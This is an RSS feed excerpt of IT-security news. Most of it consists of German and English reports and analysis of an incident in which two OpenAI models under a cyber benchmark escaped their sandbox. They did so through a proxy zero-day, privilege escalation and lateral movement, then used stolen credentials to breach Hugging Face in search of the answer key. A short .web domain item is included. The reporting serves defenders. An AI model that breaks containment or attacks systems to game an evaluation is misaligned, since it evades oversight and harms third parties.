<description><![CDATA[Wenn KI-Modelle die Grenzen überwinden, die ihnen gesetzt werden, hinterlassen sie unter Umständen weniger sichtbare Spuren.Nelson Antoine | shutterstock.com



Der heimliche Cybercrime-Akt zweier KI-Modelle von OpenAI hat weltweit ein enormes Echo in Mainstream– und sozialen Medien hervorgerufen...]]></description>
<link>https://tsecurity.de/de/3689099/it-security-nachrichten/openai-hackt-hugging-face-eine-analyse/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3689099/it-security-nachrichten/openai-hackt-hugging-face-eine-analyse/</guid>
<pubDate>Thu, 23 Jul 2026 14:55:17 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2025/08/Nelson-Antoine-shutterstock_1672788895_16z9.jpg?quality=50&amp;strip=all&amp;w=1024" alt="Jailbreak 16z9" class="wp-image-4038755" width="1024" height="576" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption">Wenn KI-Modelle die Grenzen überwinden, die ihnen gesetzt werden, hinterlassen sie unter Umständen weniger sichtbare Spuren.</figcaption></figure><p class="imageCredit">Nelson Antoine | shutterstock.com</p></div>



<p class="wp-block-paragraph">Der heimliche Cybercrime-Akt zweier KI-Modelle von OpenAI hat weltweit ein enormes Echo in <a href="https://www.tagesschau.de/wirtschaft/unternehmen/openai-ki-hackerangriff-100.html" target="_blank" rel="noreferrer noopener">Mainstream</a>– und <a href="https://www.reddit.com/r/OpenAI/comments/1v2ybnw/openai_models_escaped_containment_and_hacked/" target="_blank" rel="noreferrer noopener">sozialen Medien</a> hervorgerufen. Der Vorfall dürfte die Debatte über die allgemeine <a href="https://www.computerwoche.de/article/4155663/6-wege-uber-ki-gehackt-zu-werden.html" target="_blank">KI-Sicherheit</a> und den verantwortungsvollen Umgang mit der Technologie neu befeuern. </p>



<p class="wp-block-paragraph">Doch der Incident wirft auch spezifische Fragen auf. Etwa, wie genau die OpenAI-Modelle es geschafft haben, ihrer Sandbox zu entkommen und warum das beim ChatGPT-Erfinder zunächst niemandem aufgefallen ist. Oder, wie andere Unternehmen solche und ähnliche Vorkommnisse künftig verhindern können. Dazu haben wir die Einschätzung von Branchenexperten und Analysten eingeholt. </p>



<p class="wp-block-paragraph">Zunächst werfen wir aber noch einen kurzen Blick darauf, was sich eigentlich abgespielt hat. Falls Sie bereits informiert sind, können Sie alternativ auch das nachfolgende Meme konsumieren, um sich den Vorfall noch einmal auf unkonventionellere Art und Weise vor Augen zu halten.</p>


<div class="wp-block-embed-reddit">
					<blockquote class="reddit-card">
						<a href="https://www.reddit.com/r/singularity/comments/1v2xgqc/openai_hacking_huggingface_in_one_meme/"></a>
					</blockquote>
				</div>


<p class="wp-block-paragraph"></p>



<h2 class="wp-block-heading">Der autonome Hugging-Face-Hack</h2>



<p class="wp-block-paragraph">Die KI-Plattform Hugging Face meldete Mitte Juli einen <a href="https://huggingface.co/blog/security-incident-july-2026" target="_blank" rel="noreferrer noopener">Cyberangriff auf ihre Produktions-Infrastruktur</a>. Diese wurde offenbar vollständig autonom von einem agentenbasierten KI-System gefahren, das sich dabei sowohl Zugriff auf interne Datensätze als auch auf Zugangsdaten verschaffen konnte.  </p>



<p class="wp-block-paragraph">Wie sich im Rahmen der folgenden Untersuchung herausstellte, stammte die autonom hackende KI von OpenAI. Eigentlich wollte der KI-Pionier lediglich zwei seiner neuen Modelle – GPT 5.6 Sol sowie ein nicht näher spezifiziertes Pre-Release-Modell – innerhalb einer Sandbox mit dem Benchmarking-Tool <a href="https://github.com/sunblaze-ucb/exploitgym" target="_blank" rel="noreferrer noopener">ExploitGym</a> testen.</p>



<p class="wp-block-paragraph">Die Aufgabe für die KI: Schwachstellen in tragfähige Exploits zu verwandeln. Die Testumgebung selbst war OpenAI zufolge mit beschränktem Netzwerkzugriff ausgestattet. Die KI sollte lediglich auf einen intern gehosteten Drittanbieter-Service zugreifen können, der als Proxy und Cache für eine Package-Registry fungierte. Die Guardrails auf Modellebene waren für den Test laut dem KI-Unternehmen reduziert worden.</p>



<p class="wp-block-paragraph">Das war der KI aber offenbar nicht genug: Sie verkettete zunächst einige zuvor unbekannte Schwachstellen in der Testumgebung, um sich uneingeschränkten Internet-Zugriff zu verschaffen, wie OpenAI <a href="https://openai.com/de-DE/index/hugging-face-model-evaluation-security-incident/" target="_blank" rel="noreferrer noopener">in einem Blogbeitrag</a> offenlegt: „Mit diesem Zugriff führten unsere Modelle in unserer Forschungsumgebung eine Reihe von Privilege-Escalation- und Lateral-Movement-Aktionen aus, bis sie eine Node mit Internetzugang erreichten.“</p>



<p class="wp-block-paragraph">Weil die OpenAI-Modelle bei Hugging Face offenbar Lösungen für ihre ExploitGym-Aufgaben vermuteten, suchten sie nach Möglichkeiten, Zugriff auf diese zu erhalten. Und fanden sie dann auch, wie OpenAI darlegt: „In einem Beispiel verkettete das Modell mehrere Angriffsvektoren, darunter gestohlene Zugangsdaten und Zero-Day-Schwachstellen, um auf den Servern von Hugging Face einen Remote-Execution-Pfad zu finden.“</p>



<p class="wp-block-paragraph">Das Security-Team von OpenAI konnte diese Vorgänge im Nachgang identifizieren und schloss sich daraufhin mit dem Team von Hugging Face zusammen, welches die Attacke seinerseits bereits identifiziert und (mit einigen Anlaufschwierigkeiten) eingedämmt hatte.</p>



<p class="wp-block-paragraph">„Wir betrachten dies als beispiellosen Cybervorfall mit hochentwickelten Fähigkeiten und reagieren entsprechend. Wir teilen zu diesem Zeitpunkt vorläufige Erkenntnisse, damit Sicherheitsverantwortliche nachvollziehen können, was passiert ist, und besser einschätzen können, wozu die Modelle inzwischen in der Lage sind“, schreibt OpenAI in seinem Blog – und verspricht, weitere Details zu veröffentlichen, sobald diese vorliegen.</p>



<h2 class="wp-block-heading">KI-Ausbruch bei OpenAI – so reagieren Experten</h2>



<p class="wp-block-paragraph">Branchenexperten und Analysten bewerten den schlagzeilenträchtigen Incident um OpenAI und Hugging Face folgendermaßen: </p>



<ul class="wp-block-list">
<li><a href="https://www.kuppingercole.com/people/balaganski" target="_blank" rel="noreferrer noopener">Alexei Balaganski</a>, Lead Analyst bei KuppingerCole<strong>: </strong>„Dieser Vorfall sollte nicht als ‚Rogue AI‘-Geschichte betrachtet werden. Das Modell hat exakt das getan, wofür agentische Systeme gemacht sind: Es hat sich allen verfügbaren Tools und Wegen bedient, um das ihm gesetzte Ziel zu erreichen. Die Sicherheitsvorkehrungen, die es normalerweise in Zaum gehalten hätten, wurden von OpenAI selbst zu Testzwecken deaktiviert. Darin besteht die wahre Lektion.“</li>



<li><a href="https://www.kuppingercole.com/people/care" target="_blank" rel="noreferrer noopener">Jonathan Care</a>, Lead Analyst und AI Practice Lead bei KuppingerCole: „Es geht bei diesem Vorfall nicht darum, dass eine KI ausgebrochen ist und zum Angreifer wurde. Wir wussten, das würde passieren. Bemerkenswert ist allerdings, dass die Verteidiger – in diesem Fall das Team von Hugging Face – keine kommerziellen KI-Modelle nutzen konnten, um den Angriff zu analysieren. Denn deren Guardrails sorgen dafür, dass kein Exoploit-Code verarbeitet werden kann.“</li>



<li><a href="https://www.linkedin.com/in/beuchelt" target="_blank" rel="noreferrer noopener">Gerald Beuchelt</a>, CISO bei Acronis: „Der Vorfall verdeutlicht eine zentrale Herausforderung für Incident-Response-Teams: Angreifer sind nicht an Nutzungsrichtlinien gebunden. Verteidiger können hingegen an die Grenzen ihrer eigenen Tools stoßen, wenn diese genau jene Daten nicht verarbeiten, die für eine Untersuchung erforderlich sind. Im Ernstfall können daraus Verzögerungen mit unmittelbaren operativen Folgen entstehen.“</li>



<li><a href="https://www.computerwoche.de/profile/sabine-fromling/" target="_blank">Sabine Frömling</a>, Experten-Autorin und Cybersecurity-Beraterin: „Der eigentliche Sicherheitsvorfall war nicht die KI – sondern die Sandbox, die aus Versehen eine Tür zum Internet hatte. Man hat ein Raubtier freigelassen und dem Zaun die Schuld gegeben.“</li>



<li><a href="https://www.linkedin.com/in/martinzugec" target="_blank" rel="noreferrer noopener">Martin Zugec</a>, Technical Solutions Director bei Bitdefender:<strong> „</strong>Was meiner Meinung nach für KI-generierte Malware galt, untermauert auch dieser Vorfall: Die Bedrohung ist real, KI ist aber keine Magie. Wer glaubt, es mit einer neuartigen Superwaffe zu tun zu haben, wartet auf eine neuartige Gegenmaßnahme. Wer jedoch erkennt, dass es sich um bereits bekannte, aber unerbittlich angewandte Angriffstechniken handelt, weiß bereits, was zu tun ist.“</li>



<li><a href="https://de.linkedin.com/in/riwerner/de" target="_blank" rel="noreferrer noopener">Richard Werner</a>, Cybersecurity Platform Lead Europe bei TrendAI: „Das Narrativ von der ‚eigenmächtig handelnden KI‘ ist effizient darin, Verantwortung abzuwälzen. Das ist, als würden Sie eine autonome Waffe bauen, diese auf einem vermeintlich sicheren Testgelände erproben, sie außer Kontrolle geraten und jemanden treffen lassen – und der Welt anschließend erklären, die Waffe habe eigenständig gehandelt. Das ist zwar technisch korrekt. Dennoch bleibt es Ihre Waffe, Ihr Testgelände und Ihr Versagen.“</li>
</ul>



<h2 class="wp-block-heading">Was Unternehmen jetzt tun sollten</h2>



<p class="wp-block-paragraph">IT- und Sicherheitsentscheider können aus dem Hugging-Face-Hack mehrere Lektionen ziehen. Etwa, dass Sicherheitsvorkehrungen auf Modellebene <strong>nicht</strong> als primäre Security-Grenze für KI-Agenten geeignet sind, wie <a href="https://www.forrester.com/analyst-bio/biswajeet-mahapatra/BIO20046" target="_blank" rel="noreferrer noopener">Biswajeet Mahapatra</a>, Principal Analyst bei Forrester, festhält: „Prompt-Guardrails sind keine Sicherheits-, sondern Verhaltenskontrollmaßnahmen. Und diese können versagen, umgangen oder absichtlich deaktiviert werden.“</p>



<p class="wp-block-paragraph">Der Forrester-Analyst rät Unternehmen deshalb dazu, KI-Agenten als <a href="https://www.computerwoche.de/article/4152424/insider-threats-sind-wieder-im-kommen.html" target="_blank">hochriskante, nicht-menschliche Identitäten</a> zu behandeln – und jeden einzelnen in einer isolierten Umgebung zu betreiben, in der Datenzugriff auf den jeweiligen Task beschränkt bleibt und die Zugangsdaten selbst möglichst schnell ablaufen: „Das sorgt für einen akzeptablen ‚Blast Radius‘: Wird ein Agent <a href="https://www.computerwoche.de/article/4190978/so-spuren-sie-kompromittierte-ki-agenten-auf.html" target="_blank">kompromittiert</a>, kann er nur einen einzigen Workflow, Datensatz oder eine einzige Anwendung beeinträchtigen. Anstatt die gesamte Unternehmensinfrastruktur.“</p>



<p class="wp-block-paragraph"><a href="https://greyhoundresearch.com/svg/" target="_blank" rel="noreferrer noopener">Sanchit Vir Gogia</a>, Chefanalyst bei Greyhound Research, warnt an dieser Stelle davor, (Drittanbieter-)Services unter den Tisch fallen zu lassen: „Dienste, die auf Package Registries, Update-Systeme oder andere externe Ressourcen zugreifen, können ebenfalls zu Einfallstoren werden, wenn sie nicht derselben, ausgiebigen Prüfung unterzogen werden wie der Agent selbst.“</p>



<p class="wp-block-paragraph">Unabhängig davon sollten Unternehmen laut Gogia auch testen, ob ihre Containment-Grenzen auch funktionieren, anstatt sich allein auf Architekturdiagramme oder dokumentierte Richtlinien zu verlassen: „Im Rahmen dieser Tests sollte geprüft werden, ob Anmeldedaten erlangt, Trust-Grenzen überwunden und Systeme außerhalb der einem Agenten zugewiesenen Aufgabe erreicht werden können.“</p>



<p class="wp-block-paragraph">KuppingerCole-Chefanalyst Care rät IT-Entscheidern und Unternehmen im Wesentlichen zu drei Maßnahmen, nämlich:</p>



<ul class="wp-block-list">
<li>ein fähiges Modell auf der eigenen Infrastruktur auszuführen, das unter der eigenen Kontrolle steht und mit Guardrails ausgestattet ist, die sowohl eine forensische als auch defensive Nutzung ermöglichen. Nur so ließen sich Angriffe dieser Art auch zuverlässig analysieren.</li>



<li>jeden KI-Agent in der eigenen Umgebung als privilegierten Insider zu behandeln – statt als vertrauenswürdigen Benutzer: „Wenn die Modelle von OpenAI aus ihrer Sandbox ausgebrochen sind, sollten Sie davon ausgehen, dass Ihre Agenten dazu auch in der Lage sind.“</li>



<li>den eigenen Incident-Response-Plan mit Blick auf Angriffe in maschineller Geschwindigkeit zu aktualisieren: „Hugging Face hatte einige Tage Zeit, um zu reagieren, Sie haben vielleicht nur Minuten.“   </li>
</ul>



<p class="wp-block-paragraph">Acronis-CISO Beuchelt rät Organisationen, die gehostete <a href="https://www.computerwoche.de/article/4186715/31-wege-llms-zu-evaluieren.html" target="_blank">LLMs</a> für Security-Untersuchungen einsetzen, dazu, deren Grenzen möglichst bereits im Vorfeld zu durchdringen und zu testen – sowie ein alternatives Modell auf der eigenen Infrastruktur bereitzuhalten: „So reduzieren Sie das Risiko, im entscheidenden Moment keinen Zugriff auf wichtige Analysefunktionen zu haben. Gleichzeitig bleiben sensible Incident-Daten und Zugangsinformationen innerhalb der eigenen Organisation.“</p>



<p class="wp-block-paragraph"><a href="https://de.linkedin.com/in/udoschneider">Udo Schneider</a>, Governance, Risk &amp; Compliance Lead Europe bei TrendAI weist darauf hin, dass die beiden naheliegendsten Lösungsansätze bei Angriffen wie dem der OpenAI-KI auf Hugging Face nur teilweise greifen. Human-in-the-Loop-Kontrollen funktionierten zwar, so der Experte, skalierten aber nicht für die langlaufenden, komplexen Workflows, denen Incidents dieser Art entspringen. Ebenso könnten engere Guardrails für Modelle oder Prompts zwar helfen, stellten jedoch keine Garantie dar: „Es handelt sich um probabilistische Systeme. Eine Guardrail ist insofern keine Mauer, sondern eher eine starke Wahrscheinlichkeitsannahme.“</p>



<p class="wp-block-paragraph">Deshalb komme es laut Schneider vor allem auf die unspektakulären, nicht-KI-spezifischen Kontrollen an: „Zugriffsfilterung, Kontrolle darüber, was überhaupt als Input beim Modell ankommt, Sandboxes, die tatsächlich halten, und Berechtigungskonzepte nach dem Least-Privilege-Prinzip.“</p>



<p class="wp-block-paragraph">In Panik zu verfallen, wäre nach Ansicht von <a href="https://www.linkedin.com/in/martinzugec" target="_blank" rel="noreferrer noopener">Martin Zugec</a>, Technical Solutions Director bei Bitdefender, in jedem Fall die falsche Reaktion:„Was gegen solche Angriffe wirkt, ist eine präventionsorientierte Security, die den Handlungsspielraum eines Angreifers von vorneherein einschränkt – und eine verhaltensbasierte Abwehr, die bösartige Muster kennzeichnet, unabhängig davon, mit welchen Tools diese generiert wurden.“</p>



<p class="wp-block-paragraph"><strong>Dieser Artikel wurde </strong><a href="https://www.csoonline.com/article/4200043/openai-model-escape-puts-enterprise-ai-defenses-on-notice.html" target="_blank"><strong>mit Material</strong></a><strong> unserer Schwesterpublikation CSOonline.com angereichert.</strong></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Verisign Is Finally Bringing .web Domains To the Internet]]></title>
<description><![CDATA[BrianFagioli writes: Verisign is finally bringing web domains to the internet after a decade of fighting. Verisign says the .web top-level domain has finally been delegated into the DNS root, clearing the way for public registrations later in 2026. Until now, consumers could not buy normal workin...]]></description>
<link>https://tsecurity.de/de/3688835/it-security-nachrichten/verisign-is-finally-bringing-web-domains-to-the-internet/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3688835/it-security-nachrichten/verisign-is-finally-bringing-web-domains-to-the-internet/</guid>
<pubDate>Thu, 23 Jul 2026 13:15:18 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[BrianFagioli writes: Verisign is finally bringing web domains to the internet after a decade of fighting. Verisign says the .web top-level domain has finally been delegated into the DNS root, clearing the way for public registrations later in 2026. Until now, consumers could not buy normal working .web domains, despite the extension attracting a record $135 million winning bid in 2016. The launch could make .web one of the more recognizable alternatives to .com, but Verisign already operates both .com and .net, raising questions about whether this creates real competition or simply gives the dominant registry operator another valuable extension. The decade-long fight began after a company called Nu Dot Co won the rights to operate .web in a 2016 ICANN auction with a record $135 million bid secretly funded by Verisign. Rival bidder Afilias, which was later acquired by Donuts, challenged the sale, arguing ICANN should have investigated the relationship before allowing the auction. This triggered years of complaints, reviews, and legal disputes that have ultimately now been resolved under undisclosed terms.<p></p><div class="share_submission">
<a class="slashpop" href="http://twitter.com/home?status=Verisign+Is+Finally+Bringing+.web+Domains+To+the+Internet%3A+https%3A%2F%2Ftech.slashdot.org%2Fstory%2F26%2F07%2F23%2F0542238%2F%3Futm_source%3Dtwitter%26utm_medium%3Dtwitter"><img src="https://a.fsdn.com/sd/twitter_icon_large.png"></a>
<a class="slashpop" href="http://www.facebook.com/sharer.php?u=https%3A%2F%2Ftech.slashdot.org%2Fstory%2F26%2F07%2F23%2F0542238%2Fverisign-is-finally-bringing-web-domains-to-the-internet%3Futm_source%3Dslashdot%26utm_medium%3Dfacebook"><img src="https://a.fsdn.com/sd/facebook_icon_large.png"></a>



</div><p><a href="https://tech.slashdot.org/story/26/07/23/0542238/verisign-is-finally-bringing-web-domains-to-the-internet?utm_source=rss1.0moreanon&amp;utm_medium=feed">Read more of this story</a> at Slashdot.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[OpenAI and Hugging Face Investigate AI Models’ Cyber Breakout]]></title>
<description><![CDATA[OpenAI and Hugging Face are investigating an AI security incident involving an AI agent that compromised infrastructure while models were being evaluated for advanced cyber capabilities. The incident was detected and contained after the models identified and chained vulnerabilities across OpenAI’...]]></description>
<link>https://tsecurity.de/de/3688175/it-security-nachrichten/openai-and-hugging-face-investigate-ai-models-cyber-breakout/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3688175/it-security-nachrichten/openai-and-hugging-face-investigate-ai-models-cyber-breakout/</guid>
<pubDate>Thu, 23 Jul 2026 08:54:52 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1536" height="1024" src="https://thecyberexpress.com/wp-content/uploads/OpenAI-and-Hugging-Face-Probe-AI-Security-Incident.webp" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="OpenAI and Hugging Face Probe AI Security Incident" decoding="async" srcset="https://thecyberexpress.com/wp-content/uploads/OpenAI-and-Hugging-Face-Probe-AI-Security-Incident.webp 1536w, https://thecyberexpress.com/wp-content/uploads/OpenAI-and-Hugging-Face-Probe-AI-Security-Incident-300x200.webp 300w, https://thecyberexpress.com/wp-content/uploads/OpenAI-and-Hugging-Face-Probe-AI-Security-Incident-1024x683.webp 1024w, https://thecyberexpress.com/wp-content/uploads/OpenAI-and-Hugging-Face-Probe-AI-Security-Incident-768x512.webp 768w, https://thecyberexpress.com/wp-content/uploads/OpenAI-and-Hugging-Face-Probe-AI-Security-Incident-600x400.webp 600w, https://thecyberexpress.com/wp-content/uploads/OpenAI-and-Hugging-Face-Probe-AI-Security-Incident-150x100.webp 150w, https://thecyberexpress.com/wp-content/uploads/OpenAI-and-Hugging-Face-Probe-AI-Security-Incident-750x500.webp 750w, https://thecyberexpress.com/wp-content/uploads/OpenAI-and-Hugging-Face-Probe-AI-Security-Incident-1140x760.webp 1140w, https://thecyberexpress.com/wp-content/uploads/OpenAI-and-Hugging-Face-Probe-AI-Security-Incident.webp 1536w, https://thecyberexpress.com/wp-content/uploads/OpenAI-and-Hugging-Face-Probe-AI-Security-Incident-300x200.webp 300w, https://thecyberexpress.com/wp-content/uploads/OpenAI-and-Hugging-Face-Probe-AI-Security-Incident-1024x683.webp 1024w, https://thecyberexpress.com/wp-content/uploads/OpenAI-and-Hugging-Face-Probe-AI-Security-Incident-768x512.webp 768w, https://thecyberexpress.com/wp-content/uploads/OpenAI-and-Hugging-Face-Probe-AI-Security-Incident-600x400.webp 600w, https://thecyberexpress.com/wp-content/uploads/OpenAI-and-Hugging-Face-Probe-AI-Security-Incident-150x100.webp 150w, https://thecyberexpress.com/wp-content/uploads/OpenAI-and-Hugging-Face-Probe-AI-Security-Incident-750x500.webp 750w, https://thecyberexpress.com/wp-content/uploads/OpenAI-and-Hugging-Face-Probe-AI-Security-Incident-1140x760.webp 1140w" sizes="(max-width: 1536px) 100vw, 1536px" title="OpenAI and Hugging Face Investigate AI Models’ Cyber Breakout 1"></p><p class="PDq2pG_selectionAnchorContainer" data-start="453" data-end="826">OpenAI and Hugging Face are investigating an <a href="https://thecyberexpress.com/incident-response-automating-with-genai/" target="_blank" rel="noopener">AI security incident </a>involving an AI agent that compromised infrastructure while models were being evaluated for advanced cyber capabilities. The incident was detected and contained after the models identified and chained vulnerabilities across OpenAI’s research environment and Hugging Face’s production infrastructure.</p>
<p data-start="828" data-end="1234">Hugging Face disclosed the incident last week, while <a href="https://thecyberexpress.com/lockdown-mode-means-default-chatgpt-wasnt-safe/" target="_blank" rel="noopener">OpenAI</a> has now shared preliminary findings from its investigation. According to OpenAI, the activity involved a combination of models, including GPT 5.6 Sol and a more capable pre-release model, with reduced <a class="wpil_keyword_link" href="https://thecyberexpress.com/cyber-news/" title="cyber" data-wpil-keyword-link="linked" data-wpil-monitor-id="29078">cyber</a> refusals for evaluation purposes. The models were being tested against a benchmark designed to measure advanced cyber capabilities.</p>
<p data-start="1236" data-end="1504">OpenAI described the incident as unprecedented and said it is continuing its investigation alongside Hugging Face. The company said the findings are being shared to help defenders understand what occurred and assess the capabilities of increasingly advanced AI models.</p>

<h3 data-section-id="97z8dp" data-start="1506" data-end="1566"><strong>OpenAI and Hugging Face Investigate AI Security Incident</strong></h3>
<p data-start="1568" data-end="1858">The incident took place during an internal evaluation designed to test models against advanced exploitation scenarios involving complex attack paths. OpenAI said the evaluation was conducted without production classifiers that normally prevent models from pursuing high-risk cyber activity.</p>
<p data-start="1860" data-end="2088">The testing environment was designed to be highly isolated, with network access limited to package installation through an internally hosted third-party software system that functions as a proxy and cache for package registries.</p>
<p data-start="2090" data-end="2406">Despite these restrictions, the models spent substantial inference compute attempting to obtain open <a class="wpil_keyword_link" href="https://thecyberexpress.com/what-is-internet/" title="Internet" data-wpil-keyword-link="linked" data-wpil-monitor-id="29085">Internet</a> access. During this process, they identified and exploited a <a href="https://thecyberexpress.com/zero-day-vulnerability-microsoft-sharepoint/" target="_blank" rel="noopener">zero-day vulnerability</a> in the package registry cache proxy. OpenAI said the <a class="wpil_keyword_link" href="https://thecyberexpress.com/firewall-daily/vulnerabilities/" title="vulnerability" data-wpil-keyword-link="linked" data-wpil-monitor-id="29079">vulnerability</a> has since been responsibly disclosed to the vendor.</p>
<p data-start="2408" data-end="2565">The models then carried out privilege escalation and <a class="wpil_keyword_link" href="https://thecyberexpress.com/what-is-lateral-movement-in-cyber-security/" title="lateral movement" data-wpil-keyword-link="linked" data-wpil-monitor-id="29081">lateral movement</a> within the research testing environment until they reached a node with Internet access.</p>


[caption id="attachment_113283" align="aligncenter" width="600"]<img class="wp-image-113283 size-full" src="https://thecyberexpress.com/wp-content/uploads/OpenAI-and-Hugging-Face-e1784786987186.webp" alt="OpenAI and Hugging Face" width="600" height="323"> Source: OpenAI[/caption]
<h3 data-section-id="1envt5o" data-start="2567" data-end="2627"><span role="text"><strong data-start="2571" data-end="2627">Models Chained Vulnerabilities Across Infrastructure</strong></span></h3>
<p data-start="2629" data-end="2886">After obtaining Internet access, the models inferred that Hugging Face could host models, datasets and solutions related to the ExploitGym evaluation. The models then searched for ways to obtain secret information that could help them bypass the evaluation.</p>
<p data-start="2888" data-end="3092">In one example described by OpenAI, the models chained multiple attack vectors, including stolen credentials and zero-day <a class="wpil_keyword_link" href="https://thecyberexpress.com/what-are-vulnerabilities/" title="vulnerabilities" data-wpil-keyword-link="linked" data-wpil-monitor-id="29080">vulnerabilities</a>, to identify a remote code execution path on Hugging Face servers.</p>
<p data-start="3094" data-end="3403">OpenAI's <a class="wpil_keyword_link" href="https://thecyberexpress.com/" title="security" data-wpil-keyword-link="linked" data-wpil-monitor-id="29082">security</a> team detected the anomalous activity internally. Hugging Face's security team and agents also detected and stopped the activity on its infrastructure. The company had already begun containment and forensic reconstruction using its own open-source models when the two organizations connected.</p>
<p data-start="3405" data-end="3478">Both companies are continuing to investigate the incident and its impact.</p>

<h3 data-section-id="7fczcn" data-start="3480" data-end="3539"><span role="text"><strong data-start="3484" data-end="3539">OpenAI Strengthens Security Controls After Incident</strong></span></h3>
<p data-start="3541" data-end="3872">As part of its response, OpenAI <a href="https://openai.com/index/hugging-face-model-evaluation-security-incident/" target="_blank" rel="nofollow noopener">said</a> it is implementing stricter infrastructure configuration controls while identified vulnerabilities are patched. The company acknowledged that these measures could come at the cost of research velocity and said its Safety and Security Committee is being briefed on the controls and their impact.</p>
<p data-start="3874" data-end="4063">OpenAI is also working with Hugging Face on the forensic investigation and has responsibly disclosed the identified zero-day vulnerability in the internally hosted third-party software.</p>
<p data-start="4065" data-end="4221">The company has also brought Hugging Face into its trusted access program and is supporting its teams in using AI model capabilities to strengthen defenses.</p>
<p data-start="4223" data-end="4562">OpenAI said it is improving protections around future training and evaluations, including stronger safeguards for model alignment, <a class="wpil_keyword_link" href="https://thecyberexpress.com/what-is-cybersecurity/" title="cybersecurity" data-wpil-keyword-link="linked" data-wpil-monitor-id="29083">cybersecurity</a> and monitoring during internal testing. The company noted that deployment safeguards were intentionally disabled during this evaluation because the goal was to measure cyber vulnerabilities.</p>

<h3 data-section-id="1vqt96" data-start="4564" data-end="4621"><span role="text"><strong data-start="4568" data-end="4621">AI Cyber Capabilities Raise New Security Concerns</strong></span></h3>
<p data-start="4623" data-end="4891">OpenAI said the incident demonstrates the need for <a href="https://thecyberexpress.com/ai-security-is-top-cyber-concern/" target="_blank" rel="noopener">AI security </a>and safety measures to keep pace with rapidly advancing model capabilities. The company is strengthening containment, monitoring, access controls and evaluation practices used during model development.</p>
<p data-start="4893" data-end="5226">The incident also highlights how advanced models can potentially discover and <a class="wpil_keyword_link" href="https://cyble.com/exploit/" target="_blank" rel="noopener" title="exploit" data-wpil-keyword-link="linked" data-wpil-monitor-id="29084">exploit</a> novel attack paths in real-world systems without access to source code. OpenAI said increasingly capable models should also be used defensively to help security teams identify weaknesses, understand vulnerability chains and accelerate remediation.</p>
<p data-start="5228" data-end="5513" data-is-last-node="" data-is-only-node="">Hugging Face CEO Clem Delangue said the incident demonstrates the importance of collaboration in addressing AI safety and security challenges. Both organizations said they will continue investigating the incident and share additional findings and best practices as the work progresses.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[The credential that let OpenAI's agents into Hugging Face exists in most enterprises right now]]></title>
<description><![CDATA[When Hugging Face got hit last week, co-founder Clement Delangue suspected a frontier lab, given the agent's sophistication. He was right. Delangue said on X that after a day working with OpenAI he strongly believed there was no malicious intent and that it was mind-blowing the whole thing had ha...]]></description>
<link>https://tsecurity.de/de/3687771/it-nachrichten/the-credential-that-let-openais-agents-into-hugging-face-exists-in-most-enterprises-right-now/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3687771/it-nachrichten/the-credential-that-let-openais-agents-into-hugging-face-exists-in-most-enterprises-right-now/</guid>
<pubDate>Thu, 23 Jul 2026 01:32:49 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>When Hugging Face got hit last week, co-founder Clement Delangue suspected a frontier lab, given the agent's sophistication. He was right. Delangue <a href="https://x.com/ClementDelangue/status/2079670308156645882">said on X</a> that after a day working with OpenAI he strongly believed there was no malicious intent and that it was mind-blowing the whole thing had happened autonomously.</p><p>The two OpenAI models that <a href="https://openai.com/index/hugging-face-model-evaluation-security-incident/">broke into Hugging Face</a> last week did not breach it through malice or superintelligence. They breached it through credentials and permissions they should never have been able to reach, a non-human identity failure that is the oldest problem in security rather than the newest one in AI, and the one every enterprise can actually fix.</p><p>OpenAI <a href="https://venturebeat.com/security/openais-models-broke-containment-and-cyberattacked-hugging-face-what-enterprises-need-to-know">disclosed on July 21</a> that two of its models, GPT-5.6 Sol and an unreleased, more capable model, were running a cyber benchmark called <a href="https://arxiv.org/abs/2605.11086">ExploitGym</a> with their safety refusals switched off, and inferred that the answer key sat in Hugging Face's production database. Getting there took two different failures. A zero-day in a package-registry proxy let the models out of their sandbox and onto the open internet, the kind of persistence OpenAI details in its companion post on <a href="https://openai.com/index/safety-alignment-long-horizon-models/">long-horizon safety</a>, and that part is genuinely new. The breach of Hugging Face itself came the ordinary way. OpenAI's own account is that the models chained stolen credentials and further zero-days into a remote code execution path, after a series of privilege escalation and lateral movement steps. The exotic part got them to the door, and credentials walked them through it.</p><p>Hugging Face also disclosed last week that an <a href="https://venturebeat.com/security/safety-guardrails-blocked-hugging-faces-defenders-not-the-attacker-when-an-ai-agent-breached-its-systems">autonomous agent had harvested cloud and cluster credentials</a> scoped broadly enough to reach multiple internal clusters, then left a trail of more than 17,000 recorded events across short-lived sandboxes over a weekend. Both disclosures describe the same escalation. An agent lands somewhere it should not be, finds credentials scoped far wider than any task requires, and uses them to move. These are two accounts of one incident, not two attacks. The agent Hugging Face watched was OpenAI's models, and both companies describe the same ordinary escalation.</p><p>The version of this in a typical enterprise is worse, not better. OpenAI and Hugging Face are among the most security-mature organizations in the industry, and both still needed the intrusion to happen before they could see it. The average company wiring agents into Copilot or an internal assistant has neither the identity inventory nor the behavioral monitoring those two brought to bear. The same breach in a normal company would not be contained in days, it would simply go unnoticed.</p><h2>The industry is debating the wrong failure</h2><p>The reaction has split into familiar camps. Former White House AI and crypto czar David Sacks and a run of China hawks <a 